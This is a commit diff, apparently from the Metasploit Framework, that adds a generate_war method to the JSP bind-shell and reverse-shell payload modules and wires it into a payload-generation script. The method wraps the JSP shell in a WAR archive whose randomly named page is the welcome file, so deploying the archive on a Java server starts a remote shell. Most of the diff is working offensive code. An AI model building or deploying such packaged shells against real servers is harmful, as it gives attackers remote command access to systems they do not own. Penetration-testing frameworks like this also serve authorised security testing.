Add generate_war to jsp_shell payloads

2013-12-30 13:53:58 -06:00 · 2013-12-30 13:53:58 -06:00 · aa38a23921
parent 8986659861
commit aa38a23921
3 changed files with 50 additions and 1 deletions
--- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb
+++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb
@ -7,6 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
+require 'rex'

 module Metasploit3

@ -98,4 +99,28 @@ module Metasploit3
    return super + jsp
  end

+  def generate_war
+    jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
+
+    zip = Rex::Zip::Jar.new
+
+    web_xml = <<-EOF
+<?xml version="1.0"?>
+<!DOCTYPE web-app PUBLIC
+"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+"http://java.sun.com/dtd/web-app_2_3.dtd">
+<web-app>
+  <welcome-file-list>
+    <welcome-file>#{jsp_name}</welcome-file>
+  </welcome-file-list>
+</web-app>
+    EOF
+
+    zip.add_file("WEB-INF/", '')
+    zip.add_file("WEB-INF/web.xml", web_xml)
+    zip.add_file(jsp_name, generate)
+
+    zip
+  end
+
 end
--- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
@ -102,4 +102,28 @@ module Metasploit3
    return super + jsp
  end

+  def generate_war
+    jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
+
+    zip = Rex::Zip::Jar.new
+
+    web_xml = <<-EOF
+<?xml version="1.0"?>
+<!DOCTYPE web-app PUBLIC
+"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+"http://java.sun.com/dtd/web-app_2_3.dtd">
+<web-app>
+  <welcome-file-list>
+    <welcome-file>#{jsp_name}</welcome-file>
+  </welcome-file-list>
+</web-app>
+  EOF
+
+    zip.add_file("WEB-INF/", '')
+    zip.add_file("WEB-INF/web.xml", web_xml)
+    zip.add_file(jsp_name, generate)
+
+    zip
+  end
+
 end
--- a/2
+++ b/2
@ -213,7 +213,7 @@ if (cmd =~ /^(p|y|r|d|c|h|j|x|b|v|w|n)$/)
    plat = payload.platform.platforms

    exe  = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
-    if(!exe and plat.index(Msf::Module::Platform::Java))
+    if (!exe && payload.respond_to?(:generate_war))
      exe = payload.generate_war.pack
    elsif exe
      exe  = Msf::Util::EXE.to_jsp_war(exe)